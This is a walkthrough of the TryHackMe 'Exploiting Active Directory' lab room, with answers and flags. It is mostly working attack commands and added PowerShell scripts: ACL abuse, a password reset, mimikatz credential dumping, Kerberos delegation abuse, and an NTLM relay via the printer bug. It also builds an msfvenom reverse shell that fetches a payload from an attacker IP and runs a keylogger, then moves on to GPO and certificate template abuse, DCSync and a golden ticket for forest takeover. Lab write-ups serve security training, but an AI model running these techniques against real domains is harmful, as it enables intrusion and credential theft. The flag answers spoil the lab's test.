Exploiting Active Directory - Medium
- Exploiting Permission Delegation
- Exploiting Kerberos Delegation
- Exploiting Automated Relays
- Exploiting AD Users
- Exploiting GPOs
- Exploiting Certificates
- Exploiting Domain Trusts
Exploiting Permission Delegation
#download given .zip file (output of running SharpHound.exe)
#start neo4j
sudo neo4j console
#run bloodhound
cd /opt/BloodHound/BloodHound-linux-x64
./BloodHound --no-sandbox
#login using neo4j:bloodhound
#drop zip file in bloodhound
#check for privesc
#login via ssh using given creds
ssh za.tryhackme.loc\\ruth.dale@thmwrk1.za.tryhackme.loc
powershell -ep bypass
#launch powershell
- AD can delegate permissions & privileges through a feature named Permission Delegation.
- Permission Delegation exploits are referred to as ACL-based attacks, because AD lets admins configure ACEs (Access Control Entries) that populate the DACL (Discretionary Access Control List) of each object.
- Many ACEs can be misconfigured, and the exploit differs per ACE (GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword, AddMember, ...).
- To exploit these ACEs we need to interact with AD and make requests, for which tools such as the AD-RSAT cmdlets (ActiveDirectory module) and PowerSploit (PowerView) can be used.
- With the given .zip file (output of SharpHound.exe), we can open the collected data in BloodHound.
- We have been given SSH creds for a user in the "Domain Users" group who can RDP into THMWRK1; this only gives low-priv access.
- As this is a tiered domain, we need to first compromise "Tier 2 Admins"; in BloodHound we can check for a privesc path from "Domain Users" to "Tier 2 Admins" using the pathfinding feature.
- This shows that "Domain Users" has GenericWrite on "IT Support", and "IT Support" has ForceChangePassword over the members of "Tier 2 Admins"; both can be abused, and the 'Abuse Info' tab in BloodHound lists the PowerSploit commands for each edge:
#in powershell session
#add our AD account to the IT Support group
#(GenericWrite on the group lets us write its member attribute)
#using Add-ADGroupMember cmdlet from the AD-RSAT toolset
Add-ADGroupMember "IT Support" -Members "ruth.dale"
#verify
Get-ADGroupMember -Identity "IT Support"
#check members of Tier 2 Admins group
#pick the username of one account
Get-ADGroupMember -Identity "Tier 2 Admins"
#reset its password (ForceChangePassword = User-Force-Change-Password extended right)
#caveat: this is destructive and noisy; the old password is gone and the
#legitimate owner will notice, so record what was changed for the report
#if this is denied, the new group membership is not in our current token yet
#(group SIDs are evaluated at logon); log in again over ssh and retry
$Password = ConvertTo-SecureString "Password123" -AsPlainText -Force
Set-ADAccountPassword -Identity "t2_ross.bird" -Reset -NewPassword $Password
#now we can login as this tier 2 admin
#and get the flag from Administrator's Desktop
ssh za.tryhackme.loc\\t2_ross.bird@thmwrk1.za.tryhackme.loc
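The check a practitioner wants before abusing a BloodHound edge is to read the DACLs themselves; the following is an added example (not code from the original notes or the room) that confirms the GenericWrite and ForceChangePassword ACEs directly and then performs the abuse with cleanup of the group membership. It assumes the RSAT ActiveDirectory module can be imported in the ssh/PowerShell session and that we are already the low-priv user; group and account names are the room's.

```powershell
# Added example, not from the original notes: read the DACLs to confirm the
# edges BloodHound reported, then abuse them and remove our own artefact.
# Assumes the RSAT ActiveDirectory module is importable in the current session.
Import-Module ActiveDirectory

# Extended-right GUID for User-Force-Change-Password (well-known constant)
$ForceChangePasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'

function Get-AbusableAce {
    param(
        [Parameter(Mandatory)] [string] $TargetSam,   # e.g. 'IT Support' or 't2_ross.bird'
        [string[]] $Principals                          # names we control, e.g. 'Domain Users'
    )
    $obj = Get-ADObject -LDAPFilter "(sAMAccountName=$TargetSam)"
    if (-not $obj) { throw "no object with sAMAccountName $TargetSam" }
    # READ_CONTROL, which every authenticated user normally has, is enough to read a DACL
    $acl = Get-Acl -Path ("AD:\" + $obj.DistinguishedName)
    $R = [System.DirectoryServices.ActiveDirectoryRights]
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = ($ace.IdentityReference.Value -split '\\')[-1]
        if ($Principals -and $Principals -notcontains $who) { continue }
        $rights = $ace.ActiveDirectoryRights
        $label = $null
        if (($rights -band $R::GenericAll) -eq $R::GenericAll)            { $label = 'GenericAll' }
        elseif (($rights -band $R::GenericWrite) -eq $R::GenericWrite)    { $label = 'GenericWrite' }
        elseif (($rights -band $R::ExtendedRight) -and $ace.ObjectType -eq $ForceChangePasswordGuid) { $label = 'ForceChangePassword' }
        elseif (($rights -band $R::WriteDacl) -or ($rights -band $R::WriteOwner)) { $label = 'WriteDacl/WriteOwner' }
        if ($label) {
            [pscustomobject]@{ Target = $TargetSam; Principal = $who; Right = $label; Inherited = $ace.IsInherited }
        }
    }
}

function Invoke-GroupThenPasswordAbuse {
    param(
        [Parameter(Mandatory)] [string] $Group,        # group we have GenericWrite on
        [Parameter(Mandatory)] [string] $Victim,       # account that group has ForceChangePassword on
        [Parameter(Mandatory)] [securestring] $NewPassword,
        [string] $Self = $env:USERNAME
    )
    $already = Get-ADGroupMember -Identity $Group | Where-Object { $_.SamAccountName -eq $Self }
    if (-not $already) {
        Add-ADGroupMember -Identity $Group -Members $Self
        Write-Host "[*] added $Self to '$Group'"
    }
    try {
        # -Reset exercises the extended right; the victim's old password is not needed
        Set-ADAccountPassword -Identity $Victim -Reset -NewPassword $NewPassword
        Write-Host "[+] password of $Victim reset; the old one is gone and the owner will notice"
        # leave the group as we found it: membership is the easiest artefact for defenders to spot
        if (-not $already) { Remove-ADGroupMember -Identity $Group -Members $Self -Confirm:$false }
        return $true
    } catch {
        # most common cause: our new group SID is not in the current logon token yet
        Write-Warning "reset failed: $($_.Exception.Message) - log in again (new ssh session) and rerun"
        return $false
    }
}

# usage, matching the path found in BloodHound
Get-AbusableAce -TargetSam 'IT Support'   -Principals 'Domain Users'
Get-AbusableAce -TargetSam 't2_ross.bird' -Principals 'IT Support'
$pw = ConvertTo-SecureString 'Password123' -AsPlainText -Force
Invoke-GroupThenPasswordAbuse -Group 'IT Support' -Victim 't2_ross.bird' -NewPassword $pw
```

Note that the ForceChangePassword ACE sits on the member user objects, not on the "Tier 2 Admins" group, which is why the second check targets the individual account.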
1. Which ACE would allow you to update any non-protected parameter of a target object? - GenericWrite
2. What is the value of the flag stored on the Desktop of the Administrator user on THMWRK1 (flag1.txt)? - THM{Permission.Delegation.FTW!}
Exploiting Kerberos Delegation
- Kerberos Delegation is used to enable an application (service) to access resources hosted on a different server on behalf of the user that authenticated to it.
- Types of Kerberos Delegation:
  - Unconstrained - the original implementation and the least secure; the host keeps a copy of every connecting user's TGT and can use it against any service.
  - Constrained - restricts which services an account can delegate to (msDS-AllowedToDelegateTo on the delegating account).
  - Resource-based constrained - the target service (the resource) specifies which accounts may delegate to it (msDS-AllowedToActOnBehalfOfOtherIdentity on the resource).
- Constrained Delegation exploitation:
#in privileged ssh session
whoami /groups
#part of Tier 2 Admins
powershell -ep bypass
#launch powershell session
Import-Module C:\Tools\PowerView.ps1
#enumerate accounts configured for delegation
Get-NetUser -TrustedToAuth
#output shows the 'svcIIS' account has
#'msds-allowedtodelegateto' set for WSMAN and HTTP on THMSERVER1
#(constrained delegation with protocol transition, so S4U2self
#works with only svcIIS's own credentials)
#also it is given that there is a service
#on THMWRK1 running as svcIIS, so its password is
#stored as an LSA secret on this host
#we can use Mimikatz to dump it
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz, impersonate SYSTEM (needed to read LSA secrets)
token::elevate
#dump LSA secrets from the registry (SECURITY hive)
lsadump::secrets
#gives the cleartext password of svcIIS
#we can perform the kerberos delegation attack now
#using kekeo and mimikatz
#run kekeo
C:\Tools\kekeo\x64\kekeo.exe
#request a TGT for svcIIS; kekeo needs it for the S4U requests that follow
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
#writes the TGT to a .kirbi file
#S4U2self + S4U2proxy: get service tickets for THMSERVER1 as the
#Tier 1 user we impersonate (must not be marked "sensitive" / in Protected Users)
#for http
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
#for wsman
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
#now we have two TGS tickets
#we can exit kekeo and use mimikatz
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
privilege::debug
#import both TGS tickets
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
exit
#exit mimikatz
klist
#verify tickets were imported
#create and enter PSSession on THMServer1
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
#enters session on THMServer1
whoami
#t1_trevor.jones
#get flag from Administrator Desktop
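Before running the kekeo chain it is worth checking the two conditions that make it fail silently: the delegating account must allow protocol transition, and the impersonated user must be delegatable. The following is an added example (not from the original notes) that does the enumeration with the RSAT ActiveDirectory module, which is roughly what PowerView's Get-NetUser -TrustedToAuth does under the hood; it assumes that module is available in the session, and the account names are the room's.

```powershell
# Added example, not from the original notes: enumerate delegation via LDAP
# and check the S4U preconditions. Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# userAccountControl bits that matter for delegation (MS-ADTS / MS-SAMR values)
$UAC_TRUSTED_FOR_DELEGATION         = 0x00080000   # unconstrained delegation
$UAC_NOT_DELEGATED                  = 0x00100000   # "account is sensitive and cannot be delegated"
$UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000   # constrained with protocol transition (S4U2self allowed)

function Get-DelegationConfig {
    # every account with any delegation configured; DCs show up as Unconstrained by design
    $bitAnd = '1.2.840.113556.1.4.803'   # LDAP_MATCHING_RULE_BIT_AND
    $filter = "(|(userAccountControl:$bitAnd:=$UAC_TRUSTED_FOR_DELEGATION)" +
              "(userAccountControl:$bitAnd:=$UAC_TRUSTED_TO_AUTH_FOR_DELEGATION)" +
              "(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
    $props = 'userAccountControl', 'msDS-AllowedToDelegateTo', 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    Get-ADObject -LDAPFilter $filter -Properties $props | ForEach-Object {
        $uac = [int]$_.userAccountControl
        $allowedTo = @($_.'msDS-AllowedToDelegateTo')
        [pscustomobject]@{
            Account            = $_.Name
            Unconstrained      = [bool]($uac -band $UAC_TRUSTED_FOR_DELEGATION)
            Constrained        = $allowedTo.Count -gt 0
            # with protocol transition only the account's own key is needed (the svcIIS case);
            # without it S4U2self returns a non-forwardable ticket and S4U2proxy is refused
            ProtocolTransition = [bool]($uac -band $UAC_TRUSTED_TO_AUTH_FOR_DELEGATION)
            AllowedTo          = $allowedTo -join ', '
            RBCD               = $null -ne $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        }
    }
}

function Test-S4uTarget {
    # the user we want to impersonate must itself be delegatable
    param([Parameter(Mandatory)] [string] $SamAccountName)
    $u = Get-ADUser -Identity $SamAccountName -Properties userAccountControl, memberOf
    $sensitive = [bool]([int]$u.userAccountControl -band $UAC_NOT_DELEGATED)
    $protected = @($u.memberOf | Where-Object { $_ -like 'CN=Protected Users,*' }).Count -gt 0
    [pscustomobject]@{
        Account        = $SamAccountName
        Sensitive      = $sensitive    # the KDC refuses S4U2proxy for these accounts
        ProtectedUsers = $protected    # same effect, enforced through group membership
        Impersonable   = -not ($sensitive -or $protected)
    }
}

Get-DelegationConfig | Where-Object { $_.Constrained -or $_.Unconstrained } | Format-Table -AutoSize
Test-S4uTarget -SamAccountName 't1_trevor.jones'
```

If Test-S4uTarget reports Impersonable = False, pick another Tier 1 account; the kekeo tgs::s4u step will otherwise fail at the S4U2proxy request.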
1. Which Kerberos Delegation type allows for delegation of all services? - Unconstrained Delegation
2. Which Kerberos Delegation type allows the service to specify who is allowed to delegate to it? - Resource-based Constrained Delegation
3. Which Constrained Delegation service allows access to the file system of the system via delegation? - CIFS
4. What is the value of the flag stored in the Desktop directory of the Administrator user on THMSERVER1 (flag2.txt)? - THM{Constrained.Delegation.Can.Be.Very.Bad}
Exploiting Automated Relays
- All Windows hosts have machine accounts; DCs (domain controllers) use their machine accounts to synchronise AD updates & changes.
- There are exceptional cases in AD where one machine has admin rights over another machine; we can identify these with BloodHound.
- Using the following custom (Cypher) query, we can find instances where a computer, through group membership, has an "AdminTo" relationship over another computer:
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
- This shows that the THMSERVER2 machine account is "MemberOf" the Server Management group, which is "AdminTo" THMSERVER1.
- We abuse this with the printer bug in the MS-RPRN protocol (Print System Remote Protocol): any authenticated user can ask the print spooler on THMSERVER2 to send a change notification to a host of our choosing, and THMSERVER2$ then authenticates to that host (our relay). Apart from the machine account's admin rights on the target, we need:
- A valid set of AD account creds
- Network connectivity to the target's SMB service
- The coerced host (THMSERVER2) must be running the Print Spooler service
- The relay target (THMSERVER1) must not have SMB signing enforced
#log into ssh on THMWRK1
ssh za.tryhackme.loc\\paula.bailey@thmwrk1.za.tryhackme.loc
powershell -ep bypass
#check if printspooler service is running
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc
#alternate query
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
#in attacker machine
#check THMSERVER1 and THMSERVER2 do not have SMB signing enforced
nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc
#exploiting authentication relays
#using SpoolSample
#in attacker machine, setup ntlm relay
#using THMSERVER1 IP
ntlmrelayx.py -smb2support -t smb://10.200.60.201 -debug
#in powershell session
exit
#exit powershell
#we are in ssh now
cd C:\Tools
#execute exploit using attacker IP
SpoolSample.exe THMSERVER2.za.tryhackme.loc "10.50.57.82"
#ntlmrelayx receives THMSERVER2$'s authentication and relays it to THMSERVER1;
#with no -c/-e given it defaults to dumping the local SAM hashes
#use the ServerAdmin hash (local account on THMSERVER1) to log in over WinRM
evil-winrm -u ServerAdmin -H <serveradmin-hash> -i 10.200.60.201
#get flag from Administrator.ZA Desktop
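The three pre-checks above (an unusual machine-account group membership, a running spooler on the coerced host, and no signing on the relay target) can all be done from the domain-joined host without BloodHound or nmap. The following is an added example, not code from the original notes; it assumes the RSAT ActiveDirectory module is available and that the current user can read AD (any domain user can). The Signed column of Get-SmbConnection is used as the signing check: SMB2/3 signs a session only when one side requires it, so an unsigned session from a default client means the server does not enforce signing (if the client itself is configured to require signing, the check is inconclusive).

```powershell
# Added example, not from the original notes: pre-checks for the printer bug
# relay from a domain-joined Windows host. Assumes the RSAT ActiveDirectory
# module and the built-in SmbShare module.
Import-Module ActiveDirectory

function Find-ComputerWithGroupMembership {
    # Machine accounts are normally members of nothing but their primary group;
    # any explicit membership (THMSERVER2$ in 'Server Management' here) is where a
    # relayed machine-account authentication may land with admin rights.
    Get-ADComputer -LDAPFilter '(memberOf=*)' -Properties memberOf | ForEach-Object {
        $computer = $_.Name
        foreach ($dn in $_.memberOf) {
            [pscustomobject]@{ Computer = $computer; Group = (($dn -split ',')[0] -replace '^CN=') }
        }
    }
}

function Test-PrintSpooler {
    param([Parameter(Mandatory)] [string] $ComputerName)
    # The spooler exposes the spoolss named pipe over SMB; if the pipe can be
    # opened, the MS-RPRN interface we coerce is listening on that host.
    try {
        $null = Get-Item -Path "\\$ComputerName\pipe\spoolss" -ErrorAction Stop
        $true
    } catch { $false }
}

function Get-SmbSessionSigned {
    param([Parameter(Mandatory)] [string] $ComputerName)
    # Open a session to IPC$ with the current credentials and report whether the
    # client negotiated signing; False means the server does not require it.
    $null = net use "\\$ComputerName\IPC`$" 2>$null
    $conn = Get-SmbConnection -ServerName $ComputerName | Select-Object -First 1
    if (-not $conn) { throw "no SMB session to $ComputerName" }
    [bool]$conn.Signed
}

# usage, with the room's hosts
Find-ComputerWithGroupMembership | Format-Table -AutoSize
Test-PrintSpooler    -ComputerName 'thmserver2.za.tryhackme.loc'   # want True  (coercion source)
Get-SmbSessionSigned -ComputerName 'thmserver1.za.tryhackme.loc'   # want False (relay target)
```

Run the relay only when the first check points at a computer that is admin on the target, the spooler check is True on the source, and the signing check is False on the target; a signed session on the target means the relayed authentication will be rejected.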
1. How often (in days) are the passwords of Windows machine accounts rotated by default? - 30
2. What should not be enforced if we want to relay an SMB authentication attempt? - smb signing
3. What is the value of the flag stored in the Desktop directory of the Administrator.ZA user on THMSERVER1 (flag3.txt)? - THM{Printing.Some.Shellz}
Exploiting AD Users
- Users are the weakest link in the security chain; here we exploit them through two elements:
- Credential management (a password database kept in the user's profile)
- Keylogging (capturing the master password when the user types it)
#in evil-winrm session as ServerAdmin
cd C:\Users
Get-ChildItem -Recurse
#print directory contents recursively
#this shows .kdbx file
cd C:\Users\trevor.local\Documents
dir
#PasswordDatabase.kdbx
download C:\Users\trevor.local\Documents\PasswordDatabase.kdbx /home/sv/PasswordDatabase.kdbx
#download to attacker machine
#this is encrypted, so we need to find another way
#in attacker machine
#create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.57.82 LPORT=4444 -f psh -o shell.ps1
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.57.82; set LPORT 4444; exploit"
#setup listener
#host payload using Python webserver
python3 -m http.server
#in evil-winrm session
certutil.exe -urlcache -split -f http://10.50.57.82:8000/shell.ps1
#get payload
#execute payload
.\shell.ps1
#we get meterpreter shell on attacker
ps | grep "explorer"
#shows a session on THMSERVER1 as trevor.local
migrate <PID of explorer.exe>
#migrate from system to user
getuid
#trevor.local
keyscan_start
#start keylogger
#after 2-3 minutes
keyscan_dump
#dump the captured keystrokes; repeat until the master password shows up
keyscan_stop
#stop keylogger
#in attacker machine
sudo apt install keepassx
#now we can open kdbx file and use password found earlier
1. What application is used to open the kdbx credential database? - KeePass
2. What meterpreter command do we use to move from SYSTEM to user context? - migrate
3. What is the password of the credential database? - Imreallysurenoonewillguessmypassword
4. What is the value of the flag stored in the credential database? - THM{AD.Users.Can.Give.Up.Good.Secrets}
Exploiting GPOs
- In the .kdbx file found earlier, we had another set of creds "svcServMan:Sup3rStr0ngPass!@".
- Looking up this account in BloodHound, we can use the pathfinding feature to check the path from 'svcServMan' to 'THMSERVER2'.
- This shows that 'svcServMan' has "GenericWrite" on the GPO 'Management Server Pushes', which is "GpLink"ed to the 'Management Servers' OU, which "Contains" 'THMSERVER2'.
- So, with this account, we can edit a GPO (Group Policy Object) that applies to THMSERVER2.
- A GPO is a virtual collection of policy settings; each GPO is identified by a GUID, and its files live under the domain's SYSVOL share (\\domain\sysvol\domain\Policies\{GUID}).
- GPOs are linked to AD containers (domain, sites, OUs); GPM (Group Policy Management) is the console used to define and link policies across the AD structure.
- We can exploit this GPO to add an AD account to both the local Administrators and local Remote Desktop Users groups on THMSERVER2:
xfreerdp /v:thmwrk1.za.tryhackme.loc /u:louis.thornton /p:Islr3423
#rdp using given creds for THMWRK1
#inject svcServMan creds into memory
#using runas in command prompt
runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe
#opens cmd.exe
dir \\za.tryhackme.loc\sysvol
#verify it worked correctly
mmc
#open microsoft management console
- In the Microsoft Management Console, click File > Add/Remove Snap-in > select the 'Group Policy Management' snap-in > Add > OK
- Now we can view the GPOs for the 'za.tryhackme.loc' domain; navigate to the GPO under Servers > Management Servers > Management Server Pushes
- Right-click the GPO and Edit it; this opens the Group Policy Management Editor window.
- Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Restricted Groups > right-click and select Add Group > Browse > enter 'IT Support' > Check Names > click OK twice; the 'IT Support Properties' window opens.
- In it, use the second field, 'This group is a member of', to add the groups 'Administrators' and 'Remote Desktop Users'.
- Click Apply and OK; within 15 minutes the GPO is applied (computer policy is refreshed on a timer; gpupdate /force on the target would apply it immediately).
- Then, as the account we added to the "IT Support" group earlier is in that group, it now has administrative and RDP permissions on THMSERVER2; we can log in with xfreerdp and get the flag.
1. What object allows users to configure Windows policies? - Group Policy Object
2. What AD feature allows us to configure GPOs for the entire AD structure? - Group Policy Management
3. What is the name of the GPO that our compromised AD account owns? - Management Server Pushes
4. What is the value of the flag stored on THMSERVER2 in the Administrator's Desktop directory (flag4.txt)? - THM{Exploiting.GPOs.For.Fun.And.Profit}
Exploiting Certificates
- AD CS (Active Directory Certificate Services) is Microsoft's PKI (Public Key Infrastructure) implementation; it lets the domain run a CA so that certificates can be used to prove and delegate trust (including Kerberos logon via PKINIT).
- AD CS usually runs on only one or a few servers (often a DC). Administrators of AD CS publish certificate templates, and a template can allow any principal with enrolment permissions to request a certificate for itself.
- Finding vulnerable certificate templates:
#in rdp session on THMSERVER2
#open powershell
certutil -Template -v > templates.txt
- Going through the file, we search for a template with the following combination of parameters (the ESC1 pattern):
- Client Authentication in the Extended Key Usage
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag (the requester picks the subject and SAN)
- CTPRIVATEKEY_FLAG_EXPORTABLE_KEY in msPKI-Private-Key-Flag (so the .pfx can be exported from MMC)
- Certificate Permissions that grant Enroll to a principal we control
- We can see that 'Template[32]' is the vulnerable template: the machine account of THMSERVER2 can issue a CSR (Certificate Signing Request) for it, it lets us specify a SAN (Subject Alternative Name), and the certificate can be used for Client Authentication.
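Reading a large certutil dump by hand is error-prone; the same ESC1 combination can be queried from the Certificate Templates container in the configuration partition. The following is an added example (not from the original notes) that does this with the RSAT ActiveDirectory module; the flag values and OIDs are Microsoft's documented constants, and the module is assumed to be available in the session.

```powershell
# Added example, not from the original notes: find ESC1-style templates from AD.
# Assumes the RSAT ActiveDirectory module; constants are Microsoft's documented values.
Import-Module ActiveDirectory

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # msPKI-Enrollment-Flag: manager approval required
$CTPRIVATEKEY_FLAG_EXPORTABLE_KEY  = 0x00000010   # msPKI-Private-Key-Flag
$ClientAuthEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '2.5.29.37.0'               # Any Purpose
)
# extended rights that grant enrolment on a template
$EnrollGuids = @([guid]'0e10c968-78fb-11d1-a9c0-dfd2bfbb56b7',   # Certificate-Enrollment
                 [guid]'a05b8cc2-17bc-4802-a710-e7c15ab866a2')   # Certificate-AutoEnrollment

function Get-Esc1Template {
    $cfg   = (Get-ADRootDSE).configurationNamingContext
    $base  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfg"
    $props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-Private-Key-Flag', 'pKIExtendedKeyUsage'
    $GenericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
      ForEach-Object {
        $tpl = $_
        $eku = @($tpl.pKIExtendedKeyUsage)
        # no EKU at all also permits client authentication
        $authEku = ($eku.Count -eq 0) -or (@($eku | Where-Object { $ClientAuthEkus -contains $_ }).Count -gt 0)
        $suppliesSubject = [bool]([int]$tpl.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        $needsApproval   = [bool]([int]$tpl.'msPKI-Enrollment-Flag'        -band $CT_FLAG_PEND_ALL_REQUESTS)
        $exportable      = [bool]([int]$tpl.'msPKI-Private-Key-Flag'       -band $CTPRIVATEKEY_FLAG_EXPORTABLE_KEY)
        # who may enrol: Allow ACEs carrying an enrolment extended right, or GenericAll
        $acl = Get-Acl -Path ("AD:\" + $tpl.DistinguishedName)
        $enrollers = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                ($EnrollGuids -contains $_.ObjectType) -or
                (($_.ActiveDirectoryRights -band $GenericAll) -eq $GenericAll))
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
        [pscustomobject]@{
            Template        = $tpl.Name
            SuppliesSubject = $suppliesSubject
            AuthEku         = $authEku
            ManagerApproval = $needsApproval
            ExportableKey   = $exportable
            Enrollers       = ($enrollers -join ', ')
            ESC1            = ($suppliesSubject -and $authEku -and -not $needsApproval)
        }
      }
}

# list the candidates; check that Enrollers contains a principal we control
# (here the machine account of THMSERVER2 or a group it belongs to)
Get-Esc1Template | Where-Object ESC1 | Format-List
```

ExportableKey is reported but not required for ESC1 itself; it only matters for the MMC export route used below, since tools that enrol programmatically already hold the private key they generated.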
- Exploiting the certificate template:
- In the RDP session, click Start > Run > type 'mmc' to launch MMC > File > Add/Remove Snap-in > add the 'Certificates' snap-in > select 'Computer Account' and 'Local Computer' when prompted > OK
- Under the Certificates category, right-click Personal > All Tasks > Request New Certificate > click Next twice to select the AD enrollment policy
- The vulnerable template needs more info; click the 'More information is required' warning > change the 'Subject name' type to 'Common name' and provide any value > Add > change the 'Alternative name' type to 'User principal name' and provide 'Administrator@za.tryhackme.loc' > Add
- Click Apply & OK > select the certificate and Enroll; the cert is now listed under Personal
- Right-click the cert > All Tasks > Export > Next > select 'Yes, export the private key' > Next twice > set a password > Next and choose a location with filename 'vulncert' > Next and Finish
- We can impersonate the user now: use the certificate to request a Kerberos TGT via PKINIT (Rubeus asktgt), then load the TGT into our session
#in RDP access to THMSERVER2
#open command prompt
cd C:\Tools
#use Rubeus to request a TGT with the certificate
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\louis.thornton\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
#/user switch is the user to be impersonated (must match the UPN placed in the SAN)
#/dc switch is the IP of the domain controller THMDC
#this writes administrator.kirbi
#use mimikatz to load the TGT and authenticate to THMDC
mimikatz_trunk\x64\mimikatz.exe
#in mimikatz
privilege::debug
kerberos::ptt administrator.kirbi
#load TGT
exit
#exit mimikatz
#verify we can access the THMDC file system
dir \\THMDC.za.tryhackme.loc\c$
#this lists successfully
#get the flag
type \\THMDC.za.tryhackme.loc\c$\Users\Administrator\Desktop\flag5.txt
1. What does the user create to ask the CA for a certificate? - Certificate Signing Request
2. What is the name of Microsoft's PKI implementation? - Active Directory Certificate Services
3. What is the value of the flag stored on THMDC in the Administrator's Desktop directory (flag5.txt)? - THM{AD.Certs.Can.Get.You.DA}
Exploiting Domain Trusts
- So far we have Tier 0 access in the child domain (za.tryhackme.loc); we can use this to take control of the forest root domain (tryhackme.loc).
- Domain trusts let principals of one domain access resources in another; trusts define how the domains in a forest (and across forests) authenticate to each other.
- Types of domain trusts:
  - Directional - trust flows from the trusting domain to the trusted domain (one-way or bidirectional; parent-child trusts are bidirectional by default).
  - Transitive - the trust extends beyond the two domains to the other domains they trust.
- If we have compromised a child domain, the trust can be exploited to compromise the parent domain as well.
- KRBTGT is the account whose key the KDC (Key Distribution Center) uses to encrypt and sign TGTs; the KDC service handles all Kerberos ticket requests.
- In a Golden Ticket attack we bypass the KDC's authentication service altogether and forge our own TGTs with the krbtgt key; the KDC's ticket-granting service then accepts them as genuine.
- To forge a TGT we need:
- FQDN of the domain
- SID of the domain
- Username of the account to be impersonated
- KRBTGT password hash (NTLM/RC4, or the AES key)
#in compromised Tier 0 infra session
#open command prompt
cd C:\Tools
mimikatz_trunk\x64\mimikatz.exe
#in mimikatz
privilege::debug
lsadump::dcsync /user:za\krbtgt
#replicates the krbtgt account from the DC and prints its hashes
- An inter-realm TGT (referral ticket) is what provides access to resources in another domain; here we exploit the bidirectional trust between child & parent domain.
- We include extra SIDs from the parent domain when constructing the Golden Ticket (mimikatz /sids, written to the ExtraSids / SID history part of the PAC); when the child KDC issues the inter-realm TGT for the parent, these SIDs are carried across. Adding the SID of the forest root's "Enterprise Admins" group grants admin privileges over the entire forest, and this works because SID filtering is not applied to parent-child trusts inside a forest by default.
#open powershell in compromised rdp access
#use AD-RSAT cmdlets
#get the SID of the child domain: the DC's computer SID is the domain SID
#plus a trailing RID, so drop the last component; (Get-ADDomain).DomainSID gives it directly
Get-ADComputer -Identity "THMDC"
#get SID of the EA group (it exists only in the forest root domain)
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc
#in mimikatz session from earlier
#we can generate golden ticket now
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
#/sid: SID of the child domain (the value used here is THMDC's computer SID,
#which still works in the lab because the EA SID carries the privilege;
#the proper value is the domain SID without the trailing -1001)
#/rc4: NTLM hash of krbtgt
#/sids: SID of the EA group (RID 519), placed in the ticket's ExtraSids
#this generates the golden ticket and injects it into the session (/ptt)
#this generates golden ticket
exit
#exit mimikatz
#verify golden ticket is working
dir \\thmdc.za.tryhackme.loc\c$
#we can access child DC filesystem
dir \\thmrootdc.tryhackme.loc\c$\
#we can access parent DC filesystem too
#we have compromised parent domain
1. What domain trust relationship is by default configured between a parent and a child domain? - Bidirectional trust
2. What is the name of the AD account used by the KDC to encrypt and sign TGTs? - krbtgt
3. What is the name of the TGT that grants access to resources outside of our current domain? - Inter-realm TGT
4. What is the value of the flag stored on THMROOTDC in the Administrator's Desktop folder (flag6.txt)? - THM{Full.EA.Compromise}